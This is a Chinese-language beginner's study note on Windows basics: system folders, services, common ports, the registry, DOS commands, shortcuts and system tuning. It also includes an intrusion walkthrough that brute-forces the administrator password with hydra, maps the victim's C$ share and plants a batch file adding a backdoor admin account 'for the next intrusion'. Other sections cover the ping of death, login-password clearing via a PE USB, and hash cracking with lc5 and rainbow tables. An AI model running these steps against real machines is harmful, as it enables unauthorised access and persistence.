系统目录,服务,端口,注册表
系统目录
- Windows:系统所在的目录
- System32:用来存放系统的配置文件
- SAM文件:用来存放账户密码的文件
- host文件:用来解析域名
- Program files:默认的64位程序安装目录
- Program files(x86):默认的32位程序安装目录
- 用户:用来存储用户的配置文件或者用户的个人信息
- PerfLogs:系统日志目录,存放系统日志
服务
服务是一种应用程序类型,它在后台运行,服务应用程序通常可以在本地和通过网络为用户提供一些功能
- 服务决定了计算机的一些功能是否被启用
- 不同的服务对应的功能不同
- 通过计算机提供的服务可以有效的实现资源共享
打开服务
- 右击我的电脑打开“计算机管理”
- Win + r 打开运行,输入 services.msc 回车打开
常见的服务
- web服务
- dns服务:解析域名
- DHCP服务:给客户端分发IP
- 邮件服务:分发邮件
- telnet服务:用于远程登录
- ssh服务:和telnet一样,但是ssh是加密的连接
- ftp服务:上传下载服务
- smb服务:文件共享服务
端口
用来区分不同的服务
端口的分类
端口分为三种类型:公认端口,注册端口,动态/私有端口
常见的端口
- HTTP协议代理服务器常用端口:80/8080/3128/8081/9080
- FTP(文件传输协议):21
- Telnet(远程登录协议):23
- TFTP(简单文件传输协议):69/udp
- SSH(安全登录),SCP(文件传输),端口重定向,默认端口为:22/tcp
- SMTP(邮件传输协议):25/tcp
- POP3:110/tcp
- TOMCAT:8080
- win2003远程登录:3389
- Oracle数据库:1521
- MS SQL SERVER数据库server:1433/tcp,1433/udp
- Mysql数据库:3306
- QQ:1080/udp
- WebSphere等:9090
黑客可以通过端口进行
- 信息收集
- 目标探测
- 服务判断
- 系统判断
- 系统角色分析
注册表
系统相当于身体,注册表相当于经络,通过注册表可以修改系统的任何部分
- 打开注册表: 打开运行,输入 regedit ,然后回车即可打开注册表
- 注册表的作用: 注册表是系统的核心数据库,在整个系统中起着核心作用,可以通过注册表来修改系统的任何配置
- 注册表的结构:
- HKEY_CLASSES_ROOT:管理文件系统
- HKEY_CURRENT_USER:管理系统当前的用户信息
- HKEY_LOCAL_MACHINE:管理系统当前的硬件配置
- HKEY_USERS:管理系统用户信息
- HKEY_CURRENT_CONFIG:管理当前用户的系统配置
常用的DOS命令批处理文件的编写
- color:改变cmd颜色
- ping -t -l 65500 ip 死亡之ping
- ttl值默认为64,每经过一个路由ttl值就会减1
- ipconfig:查看IP
- ipconfig /release 释放IP地址
- ipconfig /renew 重新获取IP
- systeminfo:查看系统信息
- arp -a:显示同一个接口下同一个网段的IP地址
- net view:查看局域网内的其他计算机的计算机名
- shutdown -s -t 时间:关闭计算机
- dir:查看目录
- cd:切换目录
- start www.baidu.com:打开网页
- copy con c:\123.txt:创建文件
- ctrl + z:回车
- type 123.txt:打开文件(在命令行打开)
- start 123.txt:打开文件(使用记事本)
- md 目录名:创建目录
- rd 123:删除空目录
- ren 原文件名 新文件名:重命名文件
- del:删除文件
- copy:复制文件
- move:移动文件
- tree:以树形显示文件夹结构
- telnet:远程登录
- net use k: \192.168.1.1\c$
- net use k: \192.168.1.1\c$ /del
- net start:查看开启了那些服务
- net start 服务名:开启服务(net start )
- net stop 服务名:停止服务
- net user 用户名 密码 /add:建立用户
- net user guest/active:yes:激活来宾账户
- net user:查看有哪些用户
- net user 账户名:查看账户的属性
- net local Group administrators 用户名 /add:把用户添加到管理员中使其具有管理员权限,注意 administrator后加 s 用复数
- net user guest 12345:用guest用户登录后将密码改为12345
- net password 密码:更改系统登录密码
- net share:查看本地开启的共享
- net share ip : 开 启 i p :开启ip :开启ip共享
- net share ip$ /del:删除ip$共享
- net share c$ /del:删除c:共享
- netstat -a:查看开启了哪些端口
- netstat -n:查看端口的网络连接情况
- netstat -v:查看正在进行的工作
- at id号:开启已注册的某一个计划任务 (win10的at命令已经被弃用,改用schtasks.exe )
- at /delete:停止所有计划任务,用参数/yes则不需要确认就直接停止
- at id号 /delete:停止某一个已注册的计划任务
- at:查看所有计划任务
- attrib 文件名(目录名):查看某文件(目录)的属性
- attrib 文件名 -A -R -S -H 或 +A +R +S +H:去掉(添加)某文档的 存储,只读,系统,隐藏属性;用 + 则是添加为某属性
- tasklist 查看当前正在运行进程
- taskkill /im cmd.exe /f 通过进程名称关闭进程,/f强制执行
- taskkill /pid 进程号 /f 通过进程号关闭进程
批处理文件
- 批处理文件就是dos命令的组合文件,写在批处理文件的命令会被逐一执行
- 后缀名为 .bat
使用 hydra 工具对系统进行破解
命令:
hydra.exe -l administrator -P pass.txt sub
回车之后显示破解结果
破解之后可以映射对方的磁盘:
net use k: \192.168.80.128\c$
之后可以通过批处理文件创建一个新的账户方便下一次入侵:
copy con c:\123.bat net user cracer 123456 /add net localgroup administrators cracer /add shutdown -s -t 180
然后将写好的批处理文件放到指定的目录中
常用的快捷键以及如何优化系统
- F1:显示当前系统程序或者Windows的帮助内容
- F2:当你选中一个文件的话,这意味着重名名
- F3:当你在桌面上的时候是打开“查找:所有文件“ 对话框
- CTRL+F4:关闭当前应用程序中的当前文本(如word中)
- F5:刷新
- CTRL+F5:强行刷新
- CTRL+F6:切换到当前应用程序中的下一个文本(加 shift 可以跳到前一个窗口)
- F10或者ALT:激活当前程序的菜单栏
- Windows键或者CTRL+ESC:打开开始菜单
- CTRL+ALT+Delete:在win9x中打开关闭程序对话框
- Delete:删除被选择的选择项目,如果是文件,将被放入回收站
- Shift+Delete:删除被选择的选择项目,如果是文件,将被直接删除而不是放入回收站
- CTRL+N:新建一个新的文件
- CTRL+O:打开“打开文件对话框”
- CTRL+P:打开“打印”对话框
- CTRL+S:保存当前操作的文件
- CTRL+X:剪切
- CTRL+Insert 或者 CTRL+C:复制
- Shift+Insert 或者 CTRL+V:粘贴
- ALT+Backspace 或 CTRL+Z:撤销上一步的操作
- ALT+Shift+Backspace:重复上一步被撤销的操作
- ALT+Tab:在任务栏上的按钮间循环
- Windows键+M:最小化所有被打开的窗口
- Windows键+CTRL+M:重新将恢复上一项操作前的窗口的大小和位置
- Windows键+E:打开资源管理器
- Windows键+F:打开“查找:所有文件”对话框
- Windows键+R:打开“运行”对话框
- Windows键+L:锁屏
- Windows键+D:最小化所有窗口,在按一下恢复
- Windows键+Break:显示“系统属性”对话框
系统优化
- 修改启动项
- 在“运行”窗口中输入“msconfig”命令,打开系统配置窗口后找到“启动”选项
- 加快系统运行速度
- 在“运行”窗口中输入“msconfig”命令,打开系统配置窗口后找到“引导”选项
- 点击“高级选项”此时就可以看到我们要修改的设置项了
- 提高窗口切换提速
- 右击计算机属性–性能信息和工具—调整视觉效果
- 先点击然Windows选择计算机的最佳设置—在点击自定义—把最后的勾选去掉–确定
登录密码破解,手动清除木马病毒
- 使用启动U盘破解
- 下载U盘启动盘制作工具
- 修改BIOS为U盘优先启动
- 进入PE选择登录密码破解,回车
- 选择清除Windows登录密码
- 选择要清除的用户
- 按“Y键”确定清除
- 使用工具对hash值破解
- lc5
- 彩虹表
手动清除木马
- 查找开机启动项
- 查询服务
- 查看网络端口连接
配置黑客桌面,工作环境
- 雨滴桌面